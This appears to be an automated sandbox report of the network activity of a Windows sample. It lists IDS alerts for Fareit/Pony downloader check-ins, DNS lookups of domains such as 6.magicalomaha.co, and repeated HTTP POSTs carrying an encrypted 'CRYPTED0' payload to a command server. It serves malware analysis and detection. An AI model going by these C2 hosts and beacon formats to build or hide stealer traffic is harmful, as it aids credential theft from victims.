                                              2024-12-07T18:27:20.047745+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449736208.91.197.4480TCP
                                              2024-12-07T18:27:21.096865+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449736208.91.197.4480TCP
                                              2024-12-07T18:27:26.360110+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449740208.91.197.4480TCP
                                              2024-12-07T18:27:26.360110+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449740208.91.197.4480TCP
                                              2024-12-07T18:27:26.360110+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449740208.91.197.4480TCP
                                              2024-12-07T18:27:27.401407+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449740208.91.197.4480TCP
                                              2024-12-07T18:27:32.658251+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449741208.91.197.4480TCP
                                              2024-12-07T18:27:32.658251+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449741208.91.197.4480TCP
                                              2024-12-07T18:27:32.658251+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449741208.91.197.4480TCP
                                              2024-12-07T18:27:33.699253+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449741208.91.197.4480TCP
                                              2024-12-07T18:27:38.955340+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449742208.91.197.4480TCP
                                              2024-12-07T18:27:38.955340+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449742208.91.197.4480TCP
                                              2024-12-07T18:27:38.955340+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449742208.91.197.4480TCP
                                              2024-12-07T18:27:39.995146+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449742208.91.197.4480TCP
                                              2024-12-07T18:27:45.250773+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449743208.91.197.4480TCP
                                              2024-12-07T18:27:45.250773+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449743208.91.197.4480TCP
                                              2024-12-07T18:27:45.250773+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449743208.91.197.4480TCP
                                              2024-12-07T18:27:46.290157+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449743208.91.197.4480TCP
                                              2024-12-07T18:27:51.533770+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449744208.91.197.4480TCP
                                              2024-12-07T18:27:51.533770+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449744208.91.197.4480TCP
                                              2024-12-07T18:27:51.533770+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449744208.91.197.4480TCP
                                              2024-12-07T18:27:52.574602+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449744208.91.197.4480TCP
                                              2024-12-07T18:27:58.807048+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449746208.91.197.4480TCP
                                              2024-12-07T18:27:58.807048+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449746208.91.197.4480TCP
                                              2024-12-07T18:27:58.807048+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449746208.91.197.4480TCP
                                              2024-12-07T18:27:59.848503+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449746208.91.197.4480TCP
                                              2024-12-07T18:28:05.098193+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449758208.91.197.4480TCP
                                              2024-12-07T18:28:05.098193+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449758208.91.197.4480TCP
                                              2024-12-07T18:28:05.098193+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449758208.91.197.4480TCP
                                              2024-12-07T18:28:06.161576+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449758208.91.197.4480TCP
                                              2024-12-07T18:28:59.594886+01002014234ET MALWARE Fareit/Pony Downloader Checkin 31192.168.2.449877104.21.17.3780TCP
                                              2024-12-07T18:28:59.594886+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449877104.21.17.3780TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 7, 2024 18:27:00.909964085 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:01.029491901 CET8049730208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:01.029613018 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:01.030493021 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:01.150016069 CET8049730208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:01.150098085 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:01.269607067 CET8049730208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:02.190289974 CET8049730208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:02.190464973 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:02.190599918 CET4973080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:02.310301065 CET8049730208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:07.198765993 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:07.318639040 CET8049731208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:07.318722010 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:07.318893909 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:07.438806057 CET8049731208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:07.438896894 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:07.558465958 CET8049731208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:08.478754997 CET8049731208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:08.478816986 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:08.478912115 CET4973180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:08.598879099 CET8049731208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:13.495556116 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:13.615217924 CET8049732208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:13.615376949 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:13.615461111 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:13.734977007 CET8049732208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:13.735074043 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:13.854747057 CET8049732208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:14.803591013 CET8049732208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:14.803644896 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:14.803756952 CET4973280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:14.923230886 CET8049732208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:19.807995081 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:19.927553892 CET8049736208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:19.927668095 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:19.927830935 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:20.047256947 CET8049736208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:20.047744989 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:20.167200089 CET8049736208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:21.086838961 CET8049736208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:21.096864939 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:21.097048998 CET4973680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:21.216639042 CET8049736208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:26.120819092 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:26.240380049 CET8049740208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:26.240518093 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:26.240622997 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:26.360053062 CET8049740208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:26.360110044 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:26.479588985 CET8049740208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:27.401308060 CET8049740208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:27.401407003 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:27.401532888 CET4974080192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:27.521068096 CET8049740208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:32.417776108 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:32.538470984 CET8049741208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:32.538594961 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:32.538707018 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:32.658153057 CET8049741208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:32.658251047 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:32.778788090 CET8049741208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:33.699172974 CET8049741208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:33.699253082 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:33.700380087 CET4974180192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:33.819854021 CET8049741208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:38.714564085 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:38.834172964 CET8049742208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:38.834325075 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:38.834505081 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:38.955198050 CET8049742208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:38.955339909 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:39.075028896 CET8049742208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:39.995014906 CET8049742208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:39.995146036 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:39.995268106 CET4974280192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:40.114713907 CET8049742208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:45.011452913 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:45.131007910 CET8049743208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:45.131103039 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:45.131195068 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:45.250638962 CET8049743208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:45.250772953 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:45.371148109 CET8049743208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:46.290062904 CET8049743208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:46.290157080 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:46.290287018 CET4974380192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:46.410034895 CET8049743208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:51.292614937 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:51.412484884 CET8049744208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:51.412590981 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:51.412682056 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:51.533615112 CET8049744208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:51.533770084 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:51.653398991 CET8049744208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:52.574502945 CET8049744208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:52.574601889 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:52.579408884 CET4974480192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:52.702415943 CET8049744208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:57.589582920 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:58.192871094 CET8049746208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:58.192954063 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:58.193068981 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:58.806994915 CET8049746208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:58.807048082 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:59.432465076 CET8049746208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:59.848325014 CET8049746208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:27:59.848503113 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:59.848643064 CET4974680192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:27:59.968116045 CET8049746208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:04.855340004 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:04.974968910 CET8049758208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:04.977967978 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:04.978049994 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:05.098107100 CET8049758208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:05.098192930 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:05.217858076 CET8049758208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:06.161494017 CET8049758208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:06.161576033 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:06.161701918 CET4975880192.168.2.4208.91.197.44
                                              Dec 7, 2024 18:28:06.281281948 CET8049758208.91.197.44192.168.2.4
                                              Dec 7, 2024 18:28:58.346904039 CET4987780192.168.2.4104.21.17.37
                                              Dec 7, 2024 18:28:58.466878891 CET8049877104.21.17.37192.168.2.4
                                              Dec 7, 2024 18:28:58.466964006 CET4987780192.168.2.4104.21.17.37
                                              Dec 7, 2024 18:28:58.467014074 CET4987780192.168.2.4104.21.17.37
                                              Dec 7, 2024 18:28:58.586818933 CET8049877104.21.17.37192.168.2.4
                                              Dec 7, 2024 18:28:59.592813969 CET8049877104.21.17.37192.168.2.4
                                              Dec 7, 2024 18:28:59.594814062 CET8049877104.21.17.37192.168.2.4
                                              Dec 7, 2024 18:28:59.594886065 CET4987780192.168.2.4104.21.17.37
                                              Dec 7, 2024 18:28:59.610126972 CET4987780192.168.2.4104.21.17.37
                                              Dec 7, 2024 18:28:59.729782104 CET8049877104.21.17.37192.168.2.4
                                              Dec 7, 2024 18:28:59.933909893 CET49881443192.168.2.4188.114.97.6
                                              Dec 7, 2024 18:28:59.933952093 CET44349881188.114.97.6192.168.2.4
                                              Dec 7, 2024 18:28:59.934025049 CET49881443192.168.2.4188.114.97.6
                                              Dec 7, 2024 18:28:59.934055090 CET49881443192.168.2.4188.114.97.6
                                              Dec 7, 2024 18:28:59.934068918 CET44349881188.114.97.6192.168.2.4
                                              Dec 7, 2024 18:28:59.934176922 CET44349881188.114.97.6192.168.2.4
                                              Dec 7, 2024 18:29:00.351176977 CET4988380192.168.2.472.32.185.12
                                              Dec 7, 2024 18:29:00.470777035 CET804988372.32.185.12192.168.2.4
                                              Dec 7, 2024 18:29:00.470860004 CET4988380192.168.2.472.32.185.12
                                              Dec 7, 2024 18:29:00.470936060 CET4988380192.168.2.472.32.185.12
                                              Dec 7, 2024 18:29:00.644046068 CET804988372.32.185.12192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 7, 2024 18:27:00.133063078 CET5954153192.168.2.41.1.1.1
                                              Dec 7, 2024 18:27:00.874520063 CET53595411.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:06.162389040 CET6132653192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:06.506531954 CET53613261.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:11.511539936 CET5686353192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:11.652014017 CET53568631.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:16.667769909 CET5971653192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:16.806974888 CET53597161.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:21.823880911 CET5532653192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:21.961507082 CET53553261.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:26.980133057 CET5026453192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:27.119568110 CET53502641.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:32.137064934 CET5301953192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:32.277067900 CET53530191.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:37.292529106 CET5699653192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:37.436367989 CET53569961.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:42.449079037 CET5322153192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:42.586261034 CET53532211.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:47.589751959 CET6338753192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:47.730521917 CET53633871.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:52.745841026 CET6309753192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:52.883682966 CET53630971.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:57.886420965 CET5043553192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:58.024211884 CET53504351.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:58.025098085 CET5840253192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:58.346291065 CET53584021.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:59.610735893 CET5066753192.168.2.41.1.1.1
                                              Dec 7, 2024 18:28:59.933289051 CET53506671.1.1.1192.168.2.4
                                              Dec 7, 2024 18:28:59.934743881 CET5150953192.168.2.41.1.1.1
                                              Dec 7, 2024 18:29:00.350459099 CET53515091.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 7, 2024 18:27:00.133063078 CET192.168.2.41.1.1.10xc7ccStandard query (0)6.magicalomaha.coA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:06.162389040 CET192.168.2.41.1.1.10x4043Standard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:11.511539936 CET192.168.2.41.1.1.10xdb4aStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:16.667769909 CET192.168.2.41.1.1.10xb83aStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:21.823880911 CET192.168.2.41.1.1.10x521bStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:26.980133057 CET192.168.2.41.1.1.10xde65Standard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:32.137064934 CET192.168.2.41.1.1.10xdc3fStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:37.292529106 CET192.168.2.41.1.1.10x9c02Standard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:42.449079037 CET192.168.2.41.1.1.10x18ccStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:47.589751959 CET192.168.2.41.1.1.10xd082Standard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:52.745841026 CET192.168.2.41.1.1.10x86e6Standard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:57.886420965 CET192.168.2.41.1.1.10x6c1fStandard query (0)6.magicalomaha.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:58.025098085 CET192.168.2.41.1.1.10xd262Standard query (0)dynamotouren.deA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:59.610735893 CET192.168.2.41.1.1.10xb1c3Standard query (0)www.dynamotouren.comA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:59.934743881 CET192.168.2.41.1.1.10xd0d0Standard query (0)app.bi.com.trA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 7, 2024 18:27:00.874520063 CET1.1.1.1192.168.2.40xc7ccNo error (0)6.magicalomaha.co208.91.197.44A (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:06.506531954 CET1.1.1.1192.168.2.40x4043Name error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:11.652014017 CET1.1.1.1192.168.2.40xdb4aName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:16.806974888 CET1.1.1.1192.168.2.40xb83aName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:21.961507082 CET1.1.1.1192.168.2.40x521bName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:27.119568110 CET1.1.1.1192.168.2.40xde65Name error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:32.277067900 CET1.1.1.1192.168.2.40xdc3fName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:37.436367989 CET1.1.1.1192.168.2.40x9c02Name error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:42.586261034 CET1.1.1.1192.168.2.40x18ccName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:47.730521917 CET1.1.1.1192.168.2.40xd082Name error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:52.883682966 CET1.1.1.1192.168.2.40x86e6Name error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:58.024211884 CET1.1.1.1192.168.2.40x6c1fName error (3)6.magicalomaha.comnonenoneA (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:58.346291065 CET1.1.1.1192.168.2.40xd262No error (0)dynamotouren.de104.21.17.37A (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:58.346291065 CET1.1.1.1192.168.2.40xd262No error (0)dynamotouren.de172.67.220.132A (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:59.933289051 CET1.1.1.1192.168.2.40xb1c3No error (0)www.dynamotouren.com188.114.97.6A (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:28:59.933289051 CET1.1.1.1192.168.2.40xb1c3No error (0)www.dynamotouren.com188.114.96.6A (IP address)IN (0x0001)false
                                              Dec 7, 2024 18:29:00.350459099 CET1.1.1.1192.168.2.40xd0d0Name error (3)app.bi.com.trnonenoneA (IP address)IN (0x0001)false
                                              • 6.magicalomaha.co
                                              • dynamotouren.de
                                              • www.dynamotouren.com
                                              • 72.32.185.12
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:01.030493021 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:01.150098085 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449731208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:07.318893909 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:07.438896894 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449732208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:13.615461111 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:13.735074043 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449736208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:19.927830935 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:20.047744989 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449740208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:26.240622997 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
